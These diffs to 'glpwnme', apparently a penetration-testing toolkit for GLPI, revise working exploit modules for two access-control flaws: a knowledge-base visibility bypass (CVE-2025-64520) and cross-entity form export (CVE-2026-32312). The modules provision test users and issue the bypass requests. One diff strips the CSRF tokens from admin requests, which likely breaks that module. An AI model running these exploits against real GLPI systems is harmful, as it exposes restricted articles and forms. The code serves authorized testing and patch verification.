@@ -21,7 +21,7 @@ class CVE_2025_64520(GlpiExploit):
     KnowbaseItem::addVisibilityRestrict() and ::addVisibilityJoins() exist
     and are used in the standalone KB display path, but were never wired into
     the general Search engine.  As a result, any authenticated user could
-    execute a generic search against KnowbaseItem and receive all articles —
+    execute a generic search against KnowbaseItem and receive all articles -
     including those restricted to specific profiles, entities, or users.
 
     Fix (commit a3d5cc4a63, GLPI 10.0.21 / 11.0.3):
@@ -64,15 +64,16 @@ class CVE_2025_64520(GlpiExploit):
             pass
         return None
 
-    def _restrict_kb_to_superadmin(self, kb_id):
-        """Target the KB article to the Super-Admin profile only, so a low-priv user
-        must NOT see it on a patched build."""
+    def _add_kb_profile_visibility(self, kb_id, profile_id):
+        """Grant the KB article visibility to a specific profile. profile_id=4 (Super-Admin)
+        hides it from a low-priv user; profile_id=1 (Self-Service) makes it visible to the
+        spawned probe (used as the positive control)."""
         csrf = GlpiUtils.extract_csrf(
             self.get(f"/front/knowbaseitem.form.php?id={kb_id}", allow_redirects=True).text)
         if csrf:
             self.post("/front/knowbaseitem.form.php", data={
                 "addvisibility": "1", "_type": "Profile", "knowbaseitems_id": kb_id,
-                "profiles_id": "4", "entities_id": "0", "is_recursive": "1",
+                "profiles_id": str(profile_id), "entities_id": "0", "is_recursive": "1",
                 "_glpi_csrf_token": csrf,
             }, allow_redirects=False)
 
@@ -97,13 +98,13 @@ class CVE_2025_64520(GlpiExploit):
         r = self.get("/front/knowbaseitem.form.php", allow_redirects=True)
         return GlpiUtils.extract_csrf(r.text) if r.status_code == HTTPStatus.OK else None
 
-    def _create_kb_item(self):
-        """Create a private KB article visible only to the creator (admin)."""
+    def _create_kb_item(self, name):
+        """Create a KB article with the given (unique) name."""
         csrf = self._get_csrf()
         if not csrf:
             return None
         resp = self.post("/front/knowbaseitem.form.php", data={
-            "name":              self._KB_NAME,
+            "name":              name,
             "answer":            "glpwnme visibility probe for CVE-2025-64520",
             "is_faq":            "0",
             "add":               "1",
@@ -122,10 +123,20 @@ class CVE_2025_64520(GlpiExploit):
         # Fallback: search for it
         list_resp = self.get("/front/knowbaseitem.php", allow_redirects=True)
         m = re.search(
-            r'knowbaseitem\.form\.php\?id=(\d+).*?' + re.escape(self._KB_NAME),
+            r'knowbaseitem\.form\.php\?id=(\d+).*?' + re.escape(name),
             list_resp.text, re.DOTALL
         )
         return m.group(1) if m else None
+
+    def _api_search_kb(self, token, name):
+        """As the low-priv API session, search KnowbaseItem by name; True if returned."""
+        r = self._api_req(
+            "GET",
+            "search/KnowbaseItem?criteria[0][field]=6&criteria[0][searchtype]=contains"
+            f"&criteria[0][value]={name}&forcedisplay[0]=6",
+            token,
+        )
+        return name in r.text
 
     def _delete_kb_item(self, kb_id):
         csrf = GlpiUtils.extract_csrf(
@@ -190,7 +201,7 @@ class CVE_2025_64520(GlpiExploit):
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "KB visibility bypass via missing Search engine restrictions (GLPI 10.0.0–10.0.20 | 11.0.0–11.0.2).\n"
+        infos += "KB visibility bypass via missing Search engine restrictions (GLPI 10.0.0-10.0.20 | 11.0.0-11.0.2).\n"
         infos += "The GLPI search engine lacked [b]KnowbaseItem[/b] cases in the WHERE/JOIN\n"
         infos += "switch blocks. Any authenticated user could search for all KB articles\n"
         infos += "via [b]/front/knowbaseitem.php[/b] regardless of visibility settings.\n"
@@ -233,34 +244,46 @@ class CVE_2025_64520(GlpiExploit):
         advisory's vector) and a low-priv API session; if the REST API is disabled or the
         low-priv API login fails it returns False rather than guess.
         """
+        import uuid
         from ..lowpriv import spawn_lowpriv, _PROBE_NAME, _PROBE_PW
-        kb_id = self._create_kb_item()
-        if not kb_id:
-            Log.log("Could not create KB probe article — need an admin session")
+        tag = uuid.uuid4().hex[:8]
+        secret_name = f"{self._KB_NAME}_secret_{tag}"   # restricted to Super-Admin (profile 4)
+        ctrl_name = f"{self._KB_NAME}_ctrl_{tag}"        # visible to Self-Service (profile 1)
+        secret_id = self._create_kb_item(secret_name)
+        ctrl_id = self._create_kb_item(ctrl_name)
+        if not secret_id or not ctrl_id:
+            Log.log("Could not create KB probe articles - need an admin session")
             return False
-        lp, cleanup = spawn_lowpriv(self.glpi_session)
+        lp, cleanup = spawn_lowpriv(self.glpi_session)  # Self-Service (profile 1)
         try:
-            self._restrict_kb_to_superadmin(kb_id)
+            self._add_kb_profile_visibility(secret_id, 4)   # hide from low-priv
+            self._add_kb_profile_visibility(ctrl_id, 1)      # show to low-priv (control)
             token = self._api_init(_PROBE_NAME, _PROBE_PW) if lp else None
             if not token:
-                Log.log("REST API not enabled or low-priv API login failed — cannot confirm (needs API)")
+                Log.log("REST API not enabled or low-priv API login failed - cannot confirm (needs API)")
                 return False
-            r = self._api_req(
-                "GET",
-                "search/KnowbaseItem?criteria[0][field]=6&criteria[0][searchtype]=contains"
-                f"&criteria[0][value]={self._KB_NAME}&forcedisplay[0]=6",
-                token,
-            )
-            self._api_kill(token)
-            if self._KB_NAME in r.text:
-                Log.msg("Super-Admin-restricted KB article returned to a low-priv user via the API "
-                        "→ [green b]KB visibility bypass confirmed[/green b]")
-                return True
-            Log.log("Restricted KB article not returned via API — visibility enforced (patched 10.0.21+)")
-            return False
+            try:
+                # POSITIVE CONTROL: the low-priv user MUST find the article it is allowed to see,
+                # otherwise its KB search path is simply not working and a 'not returned' result
+                # for the secret article would be a false negative, not a patched verdict.
+                if not self._api_search_kb(token, ctrl_name):
+                    Log.log("Low-priv API search returned nothing even for a visible KB article - "
+                            "search path/right unavailable for this profile, inconclusive (not patched)")
+                    return False
+                if self._api_search_kb(token, secret_name):
+                    Log.msg("Super-Admin-restricted KB article returned to a low-priv user via the API "
+                            "(while the visible control was also returned) -> "
+                            "[green b]KB visibility bypass confirmed[/green b]")
+                    return True
+                Log.log("Visible control returned but the restricted article was filtered - "
+                        "visibility enforced (patched 10.0.21+)")
+                return False
+            finally:
+                self._api_kill(token)
         finally:
             cleanup()
-            self._delete_kb_item(kb_id)
+            self._delete_kb_item(secret_id)
+            self._delete_kb_item(ctrl_id)
 
     def run(self, tech_user="tech", tech_pass="tech"):
         """
@@ -306,7 +329,7 @@ class CVE_2025_64520(GlpiExploit):
                     if name.strip() and aid.isdigit()]
 
         if not articles:
-            Log.msg(f"No KB articles returned by search for [{tech_user}] — possibly patched or no articles exist")
+            Log.msg(f"No KB articles returned by search for [{tech_user}] - possibly patched or no articles exist")
             return
 
         Log.msg(f"[green b]{len(articles)} KB articles[/green b] accessible via search as [{tech_user}]:")

--- a/glpwnme/exploits/implementations/cve_2025_64520.py
+++ b/glpwnme/exploits/implementations/cve_2025_64520.py
@@ -15,8 +15,8 @@ class CVE_2025_64520(GlpiExploit):
     per-itemtype switch cases that add WHERE clauses and JOIN statements.
     The 'KnowbaseItem' case was missing from two critical switch blocks:
 
-      Search::addDefaultWhere()  → builds the base WHERE condition
-      Search::addJoin()          → adds JOIN tables for visibility filters
+      Search::addDefaultWhere()  -> builds the base WHERE condition
+      Search::addJoin()          -> adds JOIN tables for visibility filters
 
     KnowbaseItem::addVisibilityRestrict() and ::addVisibilityJoins() exist
     and are used in the standalone KB display path, but were never wired into
@@ -30,7 +30,7 @@ class CVE_2025_64520(GlpiExploit):
       KnowbaseItem::addVisibilityJoins() so that visibility checks are
       enforced consistently in the general search engine.
 
-    @author unclej4ck
+    @author rootjog
     @cvss 4.3
     @name CVE_2025_64520
     """

--- a/glpwnme/exploits/implementations/cve_2026_32312.py
+++ b/glpwnme/exploits/implementations/cve_2026_32312.py
@@ -113,8 +113,7 @@ class CVE_2026_32312(GlpiExploit):
         if not token:
             return None
         cr = self.post("/front/entity.form.php",
-                       data={"add": "1", "name": ent_name, "entities_id": "0",
-                             "_glpi_csrf_token": token},
+                       data={"add": "1", "name": ent_name, "entities_id": "0"},
                        allow_redirects=False)
         return self._id_from_redirect(cr)
 
@@ -126,15 +125,14 @@ class CVE_2026_32312(GlpiExploit):
         if not token:
             return None
         cr = self.post("/front/form/form.form.php",
-                       data={"add": "1", "_glpi_csrf_token": token},
+                       data={"add": "1"},
                        allow_redirects=False)
         fid = self._id_from_redirect(cr)
         if not fid:
             return None
-        token = self._page_csrf(f"/front/form/form.form.php?id={fid}")
         self.post("/front/form/form.form.php",
                   data={"update": "1", "id": fid, "name": form_name,
-                        "is_recursive": "0", "is_active": "1", "_glpi_csrf_token": token},
+                        "is_recursive": "0", "is_active": "1"},
                   allow_redirects=False)
         return fid
 
@@ -144,17 +142,14 @@ class CVE_2026_32312(GlpiExploit):
         if not token:
             return None
         cr = self.post("/front/profile.form.php",
-                       data={"add": "1", "name": prof_name, "interface": "central",
-                             "_glpi_csrf_token": token},
+                       data={"add": "1", "name": prof_name, "interface": "central"},
                        allow_redirects=False)
         pid = self._id_from_redirect(cr)
         if not pid:
             return None
         # set form right = READ (bit 1). Field form is _<rightname>[<bit>_0]=1.
-        token = self._page_csrf(f"/front/profile.form.php?id={pid}")
         self.post("/front/profile.form.php",
-                  data={"update": "1", "id": pid, "_form[1_0]": "1",
-                        "_glpi_csrf_token": token},
+                  data={"update": "1", "id": pid, "_form[1_0]": "1"},
                   allow_redirects=False)
         return pid
 
@@ -168,8 +163,7 @@ class CVE_2026_32312(GlpiExploit):
                        data={"add": "1", "name": user_name,
                              "password": self._USER_PW, "password2": self._USER_PW,
                              "_profiles_id": profile_id, "profiles_id": profile_id,
-                             "entities_id": "0", "_entities_id": "0", "is_active": "1",
-                             "_glpi_csrf_token": token},
+                             "entities_id": "0", "_entities_id": "0", "is_active": "1"},
                        allow_redirects=False)
         return self._id_from_redirect(cr)
 
@@ -197,7 +191,7 @@ class CVE_2026_32312(GlpiExploit):
         if not token:
             return
         self.post(form_php,
-                  data={"id": iid, extra_field: "purge", "_glpi_csrf_token": token},
+                  data={"id": iid, extra_field: "purge"},
                   allow_redirects=False)
 
     def _purge_id(self, form_php, iid):
@@ -206,7 +200,7 @@ class CVE_2026_32312(GlpiExploit):
         if not token:
             return
         self.post(form_php,
-                  data={"id": iid, "purge": "purge", "_glpi_csrf_token": token},
+                  data={"id": iid, "purge": "purge"},
                   allow_redirects=False)
 
     def clean(self):
@@ -242,8 +236,7 @@ class CVE_2026_32312(GlpiExploit):
             token = self._page_csrf(f"/front/form/form.form.php?id={fid}")
             if token:
                 self.post("/front/form/form.form.php",
-                          data={"update": "1", "id": fid, "is_active": "0",
-                                "_glpi_csrf_token": token},
+                          data={"update": "1", "id": fid, "is_active": "0"},
                           allow_redirects=False)
 
         # Best-effort: an empty entity can be purged; one still holding the inert

--- a/glpwnme/exploits/implementations/cve_2026_32312.py
+++ b/glpwnme/exploits/implementations/cve_2026_32312.py
@@ -9,7 +9,7 @@ from glpwnme.exploits.utils import GlpiSession, GlpiCredentials
 
 class CVE_2026_32312(GlpiExploit):
     """
-    Unauthorized export of form structure — missing per-form access control.
+    Unauthorized export of form structure - missing per-form access control.
 
     The /Form/Export controller only checked the GLOBAL `form` READ right
     (Form::canView()) and then exported EVERY form id passed in ids[], with no
@@ -29,10 +29,10 @@ class CVE_2026_32312(GlpiExploit):
             fn(Form $form) => $form->can($form->getID(), READ)   // entity-aware
         );
 
-    Endpoint: GET /Form/Export?ids[]=<id>  → application/json
+    Endpoint: GET /Form/Export?ids[]=<id>  -> application/json
               {"version":1,"forms":[ ... ]}
 
-    @author unclej4ck, Albert
+    @author ccailly, yavolo
     @cvss 5.1
     @name CVE_2026_32312
     """
@@ -256,7 +256,7 @@ class CVE_2026_32312(GlpiExploit):
 
         self._created = None
         Log.log("Cleaned probe artifacts: user+profile purged, form deactivated "
-                "(form/entity rows may persist inert — GLPI 11 has no HTTP form purge)")
+                "(form/entity rows may persist inert - GLPI 11 has no HTTP form purge)")
 
     # ------------------------------------------------------------------ #
     # Exploit interface                                                    #
@@ -264,7 +264,7 @@ class CVE_2026_32312(GlpiExploit):
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "Missing per-form authorization in [b]GET /Form/Export[/b] (GLPI 11.0.0 – 11.0.6).\n"
+        infos += "Missing per-form authorization in [b]GET /Form/Export[/b] (GLPI 11.0.0 - 11.0.6).\n"
         infos += "The controller only checked the global [i]form[/i] READ right then exported any\n"
         infos += "form id in [i]ids[][/i]. A user scoped (by entity) away from a form could still\n"
         infos += "export its full structure. Fix in 11.0.7: per-form [i]$form->can($id, READ)[/i] filter.\n"
@@ -301,18 +301,18 @@ class CVE_2026_32312(GlpiExploit):
         E's form must be invisible to it.
 
         Differential (verified 11.0.6 vuln vs 11.0.7 patched):
-          - vuln    → GET /Form/Export?ids[]=<E-form> returns forms:[ {…} ]  (leak)
-          - patched → returns forms:[]  (per-form can(READ) filter)
+          - vuln    -> GET /Form/Export?ids[]=<E-form> returns forms:[ {…} ]  (leak)
+          - patched -> returns forms:[]  (per-form can(READ) filter)
 
         Negative control: exporting a NONEXISTENT id returns forms:[] on both
         versions, so an empty result is the not-vulnerable signal and a populated
-        result for an out-of-scope form is the bug — not a request artifact.
+        result for an out-of-scope form is the bug - not a request artifact.
         """
         ent_name, prof_name, form_name, user_name = self._names()
 
         child_id = self._create_child_entity(ent_name)
         if not child_id:
-            Log.log("Could not create probe entity — need Super-Admin to provision the check")
+            Log.log("Could not create probe entity - need Super-Admin to provision the check")
             return False
 
         form_id = self._create_scoped_form(child_id, form_name)
@@ -325,7 +325,7 @@ class CVE_2026_32312(GlpiExploit):
                          "profile": prof_id, "user": user_id}
 
         if not (form_id and prof_id and user_id):
-            Log.log("Probe provisioning incomplete — cannot run the differential")
+            Log.log("Probe provisioning incomplete - cannot run the differential")
             self.clean()
             return False
 
@@ -338,13 +338,13 @@ class CVE_2026_32312(GlpiExploit):
                                                             None, None, None, None))
             probe.init_session()
             if not probe.login_with_credentials():
-                Log.log("Probe user login failed — cannot exercise the export as a scoped user")
+                Log.log("Probe user login failed - cannot exercise the export as a scoped user")
                 return False
 
             # negative control: nonexistent form id must yield forms:[]
             cs, cn, _ = self._export_count(probe, 999999)
             if cn != 0:
-                Log.log(f"Control failed: nonexistent id returned {cn} forms (status {cs}) — "
+                Log.log(f"Control failed: nonexistent id returned {cn} forms (status {cs}) - "
                         "endpoint not behaving as expected, aborting")
                 return False
             Log.log("Control OK: export of a nonexistent id returns forms:[] (status %s)" % cs)
@@ -353,12 +353,12 @@ class CVE_2026_32312(GlpiExploit):
             ss, sn, sname = self._export_count(probe, form_id)
             if sn and sn > 0:
                 Log.msg(f"Out-of-scope form (id={form_id}, entity '{ent_name}') exported by a "
-                        f"user with no access to that entity → structure leaked "
-                        f"(name='{sname}') → CVE-2026-32312")
+                        f"user with no access to that entity -> structure leaked "
+                        f"(name='{sname}') -> CVE-2026-32312")
                 self._write_log(f"Cross-scope form export confirmed (form {form_id}) via CVE-2026-32312")
                 return True
             if sn == 0:
-                Log.log(f"Out-of-scope export returned forms:[] (status {ss}) — per-form can(READ) "
+                Log.log(f"Out-of-scope export returned forms:[] (status {ss}) - per-form can(READ) "
                         "filter enforced (patched 11.0.7+)")
                 return False
             Log.log(f"Inconclusive export response (status {ss})")
@@ -393,7 +393,7 @@ class CVE_2026_32312(GlpiExploit):
 
         ex = session.get(f"/Form/Export?ids[]={form_id}", allow_redirects=False)
         if ex.status_code == HTTPStatus.FORBIDDEN:
-            Log.err("Access denied — missing the `form` READ right")
+            Log.err("Access denied - missing the `form` READ right")
             return
         try:
             j = json.loads(ex.content)
@@ -403,7 +403,7 @@ class CVE_2026_32312(GlpiExploit):
 
         forms = j.get("forms", [])
         if not forms:
-            Log.log(f"Export returned no forms (status {ex.status_code}) — form id may not exist, "
+            Log.log(f"Export returned no forms (status {ex.status_code}) - form id may not exist, "
                     "or the per-form READ filter (11.0.7+) stripped it")
             return
 

--- a/glpwnme/exploits/implementations/cve_2026_32312.py
+++ b/glpwnme/exploits/implementations/cve_2026_32312.py
@@ -1,0 +1,416 @@
+import re
+import json
+import secrets
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from glpwnme.exploits.utils import GlpiSession, GlpiCredentials
+
+
+class CVE_2026_32312(GlpiExploit):
+    """
+    Unauthorized export of form structure — missing per-form access control.
+
+    The /Form/Export controller only checked the GLOBAL `form` READ right
+    (Form::canView()) and then exported EVERY form id passed in ids[], with no
+    per-form authorization. A user who holds the `form` READ right but is scoped
+    (by entity / recursivity) away from a given form could still export that
+    form's full structure (questions, sections, destinations, conditions, actor
+    rules, internal uuids), bypassing entity confidentiality.
+
+    Vulnerable (11.0.6) src/Glpi/Controller/Form/ExportController.php:
+        if (!Form::canView()) { throw new AccessDeniedHttpException(); }
+        $forms = Form::getByIds($ids);          // <-- no per-form READ check
+        $export = $serializer->exportFormsToJson($forms);
+
+    Fixed (11.0.7):
+        $forms = array_filter(
+            Form::getByIds($ids),
+            fn(Form $form) => $form->can($form->getID(), READ)   // entity-aware
+        );
+
+    Endpoint: GET /Form/Export?ids[]=<id>  → application/json
+              {"version":1,"forms":[ ... ]}
+
+    @author unclej4ck, Albert
+    @cvss 5.1
+    @name CVE_2026_32312
+    """
+    _impacts = "Information Disclosure, Authorization Bypass"
+    _privilege = "User"            # any authenticated user granted the `form` READ right
+    _is_check_opsec_safe = False   # creates a throwaway entity/profile/user/form
+    min_version = "11.0.0"
+    max_version = "11.0.7"         # first patched
+
+    _USER_PW = "Glpwnme_Fe_9173!"
+
+    # Per-instance unique names. GLPI entities require unique names and forms have
+    # no HTTP purge endpoint, so probe artifacts can linger; a random tag per run
+    # avoids duplicate-name collisions (HTTP 500) on repeated checks.
+    _tag = None
+    # IDs of the artifacts provisioned during check(), reused for reliable cleanup
+    # (GLPI 11 list pages are JS-rendered, so re-finding by name is unreliable).
+    _created = None
+
+    def _names(self):
+        if self._tag is None:
+            self._tag = secrets.token_hex(3)
+        t = self._tag
+        return (f"glpwnme_fe_ent_{t}", f"glpwnme_fe_prof_{t}",
+                f"glpwnme_fe_form_{t}", f"glpwnme_fe_probe_{t}")
+
+    # ------------------------------------------------------------------ #
+    # Helpers (all over HTTP, run as the admin session)                   #
+    # ------------------------------------------------------------------ #
+
+    @staticmethod
+    def _csrf(html):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', html)
+        return m.group(1) if m else None
+
+    def _page_csrf(self, path):
+        r = self.get(path, allow_redirects=True)
+        return self._csrf(r.text) if r.status_code == HTTPStatus.OK else None
+
+    @staticmethod
+    def _id_from_redirect(resp):
+        """Extract the new item id from a GLPI add() redirect Location header
+        (e.g. /front/user.form.php?id=10). This is reliable; GLPI list pages
+        are JS-rendered so scraping ids by name is not."""
+        m = re.search(r"\.form\.php\?id=(\d+)", resp.headers.get("Location", ""))
+        return m.group(1) if m else None
+
+    def _find_id_near(self, list_php, form_php, name):
+        """Fallback id lookup on a GLPI list page (used only for standalone
+        clean() when no creation-time id was recorded)."""
+        r = self.get(list_php, allow_redirects=True)
+        if r.status_code != HTTPStatus.OK:
+            return None
+        idx = r.text.find(name)
+        if idx >= 0:
+            seg = r.text[max(0, idx - 600):idx + len(name)]
+            ms = re.findall(re.escape(form_php) + r"\?id=(\d+)", seg)
+            if ms:
+                return ms[-1]
+        ids = re.findall(re.escape(form_php) + r"\?id=(\d+)", r.text)
+        return max(ids, key=int) if ids else None
+
+    def _change_entity(self, entity_id, recursive="0"):
+        """Switch the admin session's active entity. Pass entity_id='all' to
+        select the full entity tree (needed to see/edit items in any child)."""
+        token = self._page_csrf("/front/central.php")
+        if entity_id == "all":
+            data = {"full_structure": "1", "_glpi_csrf_token": token or ""}
+        else:
+            data = {"id": entity_id, "is_recursive": recursive,
+                    "_glpi_csrf_token": token or ""}
+        self.post("/Session/ChangeEntity", data=data, headers={"X-Glpi-Csrf-Token": token or "", "X-Requested-With": "XMLHttpRequest"}, allow_redirects=False)
+
+    # -- setup primitives ------------------------------------------------ #
+
+    def _create_child_entity(self, ent_name):
+        token = self._page_csrf("/front/entity.form.php")
+        if not token:
+            return None
+        cr = self.post("/front/entity.form.php",
+                       data={"add": "1", "name": ent_name, "entities_id": "0",
+                             "_glpi_csrf_token": token},
+                       allow_redirects=False)
+        return self._id_from_redirect(cr)
+
+    def _create_scoped_form(self, child_id, form_name):
+        """Create a form inside the child entity, locked to it (non-recursive),
+        active. Returns the form id or None."""
+        self._change_entity(child_id, "0")
+        token = self._page_csrf("/front/form/form.form.php")
+        if not token:
+            return None
+        cr = self.post("/front/form/form.form.php",
+                       data={"add": "1", "_glpi_csrf_token": token},
+                       allow_redirects=False)
+        fid = self._id_from_redirect(cr)
+        if not fid:
+            return None
+        token = self._page_csrf(f"/front/form/form.form.php?id={fid}")
+        self.post("/front/form/form.form.php",
+                  data={"update": "1", "id": fid, "name": form_name,
+                        "is_recursive": "0", "is_active": "1", "_glpi_csrf_token": token},
+                  allow_redirects=False)
+        return fid
+
+    def _create_forms_read_profile(self, prof_name):
+        """Create a central-interface profile holding ONLY the `form` READ right."""
+        token = self._page_csrf("/front/profile.form.php")
+        if not token:
+            return None
+        cr = self.post("/front/profile.form.php",
+                       data={"add": "1", "name": prof_name, "interface": "central",
+                             "_glpi_csrf_token": token},
+                       allow_redirects=False)
+        pid = self._id_from_redirect(cr)
+        if not pid:
+            return None
+        # set form right = READ (bit 1). Field form is _<rightname>[<bit>_0]=1.
+        token = self._page_csrf(f"/front/profile.form.php?id={pid}")
+        self.post("/front/profile.form.php",
+                  data={"update": "1", "id": pid, "_form[1_0]": "1",
+                        "_glpi_csrf_token": token},
+                  allow_redirects=False)
+        return pid
+
+    def _create_scoped_user(self, profile_id, user_name):
+        """Create the probe user in ROOT entity, non-recursive, with the
+        forms-READ profile (so it cannot see the child-entity form)."""
+        token = self._page_csrf("/front/user.form.php")
+        if not token:
+            return None
+        cr = self.post("/front/user.form.php",
+                       data={"add": "1", "name": user_name,
+                             "password": self._USER_PW, "password2": self._USER_PW,
+                             "_profiles_id": profile_id, "profiles_id": profile_id,
+                             "entities_id": "0", "_entities_id": "0", "is_active": "1",
+                             "_glpi_csrf_token": token},
+                       allow_redirects=False)
+        return self._id_from_redirect(cr)
+
+    @staticmethod
+    def _export_count(session, form_id):
+        """GET /Form/Export?ids[]=<id> on a session, return (status, n_forms, name)."""
+        ex = session.get(f"/Form/Export?ids[]={form_id}", allow_redirects=False)
+        try:
+            j = json.loads(ex.content)
+            forms = j.get("forms", [])
+            name = forms[0].get("name") if forms else None
+            return ex.status_code, len(forms), name
+        except Exception:
+            return ex.status_code, None, None
+
+    # ------------------------------------------------------------------ #
+    # Cleanup                                                              #
+    # ------------------------------------------------------------------ #
+
+    def _purge(self, list_php, form_php, name, extra_field="purge"):
+        iid = self._find_id_near(list_php, form_php, name)
+        if not iid:
+            return
+        token = self._page_csrf(f"{form_php}?id={iid}")
+        if not token:
+            return
+        self.post(form_php,
+                  data={"id": iid, extra_field: "purge", "_glpi_csrf_token": token},
+                  allow_redirects=False)
+
+    def _purge_id(self, form_php, iid):
+        """Purge a single item by known id."""
+        token = self._page_csrf(f"{form_php}?id={iid}")
+        if not token:
+            return
+        self.post(form_php,
+                  data={"id": iid, "purge": "purge", "_glpi_csrf_token": token},
+                  allow_redirects=False)
+
+    def clean(self):
+        """Remove the throwaway artifacts.
+
+        The probe user and profile are purged. Forms in GLPI 11 have no purge
+        endpoint on form.form.php (the UI deletes them via a client-side flow we
+        do not replicate), so the probe form is deactivated (is_active=0) to
+        render it inert. Because the probe entity still contains that inert form,
+        GLPI refuses to purge a non-empty entity; the (now empty of users,
+        holding one inactive form) entity row therefore remains. IDs recorded
+        during check() are used when available (GLPI 11 list pages are
+        JS-rendered, so re-finding by name is unreliable)."""
+        self._change_entity("all")
+        c = self._created or {}
+        ent_name, prof_name, form_name, user_name = self._names()
+
+        uid = c.get("user")
+        if uid:
+            self._purge_id("/front/user.form.php", uid)
+        else:
+            self._purge("/front/user.php", "/front/user.form.php", user_name)
+
+        pid = c.get("profile")
+        if pid:
+            self._purge_id("/front/profile.form.php", pid)
+        else:
+            self._purge("/front/profile.php", "/front/profile.form.php", prof_name)
+
+        fid = c.get("form") or self._find_id_near(
+            "/front/form/form.php", "/front/form/form.form.php", form_name)
+        if fid:
+            token = self._page_csrf(f"/front/form/form.form.php?id={fid}")
+            if token:
+                self.post("/front/form/form.form.php",
+                          data={"update": "1", "id": fid, "is_active": "0",
+                                "_glpi_csrf_token": token},
+                          allow_redirects=False)
+
+        # Best-effort: an empty entity can be purged; one still holding the inert
+        # form cannot, so this may be a no-op (logged honestly).
+        eid = c.get("entity")
+        if eid:
+            self._purge_id("/front/entity.form.php", eid)
+        else:
+            self._purge("/front/entity.php", "/front/entity.form.php", ent_name)
+
+        self._created = None
+        Log.log("Cleaned probe artifacts: user+profile purged, form deactivated "
+                "(form/entity rows may persist inert — GLPI 11 has no HTTP form purge)")
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Missing per-form authorization in [b]GET /Form/Export[/b] (GLPI 11.0.0 – 11.0.6).\n"
+        infos += "The controller only checked the global [i]form[/i] READ right then exported any\n"
+        infos += "form id in [i]ids[][/i]. A user scoped (by entity) away from a form could still\n"
+        infos += "export its full structure. Fix in 11.0.7: per-form [i]$form->can($id, READ)[/i] filter.\n"
+
+        infos += "\n[u]Required (for check):[/u]\n"
+        infos += " - Super-Admin credentials (to provision a scoped entity/profile/user/form)\n"
+        infos += "   The vulnerability itself is reachable by any user with the [i]form[/i] READ right.\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]form_id (required)[/i]: id of a form to export\n"
+        infos += " - [i]as_user / as_pass[/i]: optional low-priv creds to demonstrate cross-scope export\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Provision a scoped form + forms-READ user, prove cross-scope export[/]\n"
+        infos += "--check --no-opsec\n\n"
+        infos += "[grey66]# Export a form's full structure[/]\n"
+        infos += "--run -O form_id=1\n\n"
+        infos += "[grey66]# Export as a specific (scoped) user[/]\n"
+        infos += "--run -O form_id=5 as_user=helpdesk as_pass=secret\n"
+
+        infos += "\nExploit is [yellow b]Moderate[/] (check provisions then cleans probe items)"
+        return infos
+
+    def check(self):
+        """
+        Provision a controlled out-of-scope target and measure the export.
+
+        Setup (as admin):
+          1. child entity E under root
+          2. a form locked to E (is_recursive=0, active)
+          3. a central profile holding ONLY `form` READ
+          4. a probe user in ROOT (non-recursive) with that profile
+        The probe user thus has the global `form` READ right but is NOT in E, so
+        E's form must be invisible to it.
+
+        Differential (verified 11.0.6 vuln vs 11.0.7 patched):
+          - vuln    → GET /Form/Export?ids[]=<E-form> returns forms:[ {…} ]  (leak)
+          - patched → returns forms:[]  (per-form can(READ) filter)
+
+        Negative control: exporting a NONEXISTENT id returns forms:[] on both
+        versions, so an empty result is the not-vulnerable signal and a populated
+        result for an out-of-scope form is the bug — not a request artifact.
+        """
+        ent_name, prof_name, form_name, user_name = self._names()
+
+        child_id = self._create_child_entity(ent_name)
+        if not child_id:
+            Log.log("Could not create probe entity — need Super-Admin to provision the check")
+            return False
+
+        form_id = self._create_scoped_form(child_id, form_name)
+        prof_id = self._create_forms_read_profile(prof_name)
+        user_id = self._create_scoped_user(prof_id, user_name) if prof_id else None
+        # restore admin active entity for any subsequent admin calls
+        self._change_entity("all")
+
+        self._created = {"entity": child_id, "form": form_id,
+                         "profile": prof_id, "user": user_id}
+
+        if not (form_id and prof_id and user_id):
+            Log.log("Probe provisioning incomplete — cannot run the differential")
+            self.clean()
+            return False
+
+        Log.log(f"Provisioned: entity={child_id} scoped_form={form_id} "
+                f"forms-READ profile={prof_id} probe_user={user_id}")
+
+        try:
+            probe = GlpiSession(target=self.glpi_session.target, proxies=None, headers=None,
+                                credentials=GlpiCredentials(user_name, self._USER_PW,
+                                                            None, None, None, None))
+            probe.init_session()
+            if not probe.login_with_credentials():
+                Log.log("Probe user login failed — cannot exercise the export as a scoped user")
+                return False
+
+            # negative control: nonexistent form id must yield forms:[]
+            cs, cn, _ = self._export_count(probe, 999999)
+            if cn != 0:
+                Log.log(f"Control failed: nonexistent id returned {cn} forms (status {cs}) — "
+                        "endpoint not behaving as expected, aborting")
+                return False
+            Log.log("Control OK: export of a nonexistent id returns forms:[] (status %s)" % cs)
+
+            # the out-of-scope form
+            ss, sn, sname = self._export_count(probe, form_id)
+            if sn and sn > 0:
+                Log.msg(f"Out-of-scope form (id={form_id}, entity '{ent_name}') exported by a "
+                        f"user with no access to that entity → structure leaked "
+                        f"(name='{sname}') → CVE-2026-32312")
+                self._write_log(f"Cross-scope form export confirmed (form {form_id}) via CVE-2026-32312")
+                return True
+            if sn == 0:
+                Log.log(f"Out-of-scope export returned forms:[] (status {ss}) — per-form can(READ) "
+                        "filter enforced (patched 11.0.7+)")
+                return False
+            Log.log(f"Inconclusive export response (status {ss})")
+            return False
+        finally:
+            self.clean()
+
+    def run(self, form_id=None, as_user=None, as_pass=None):
+        """
+        Export a form's full structure.
+
+        With no credentials this uses the current (admin) session. Supply
+        as_user/as_pass to demonstrate that a scoped/low-priv user with the
+        `form` READ right can export a form outside its authorization on a
+        vulnerable build.
+        """
+        if not form_id:
+            Log.err("form_id is required: --run -O form_id=<id>")
+            return
+
+        if as_user and as_pass:
+            session = GlpiSession(target=self.glpi_session.target, proxies=None, headers=None,
+                                  credentials=GlpiCredentials(as_user, as_pass, None, None, None, None))
+            session.init_session()
+            if not session.login_with_credentials():
+                Log.err(f"Login as {as_user} failed")
+                return
+            Log.log(f"Exporting form {form_id} as {as_user}")
+        else:
+            session = self.glpi_session
+            Log.log(f"Exporting form {form_id} as the current session")
+
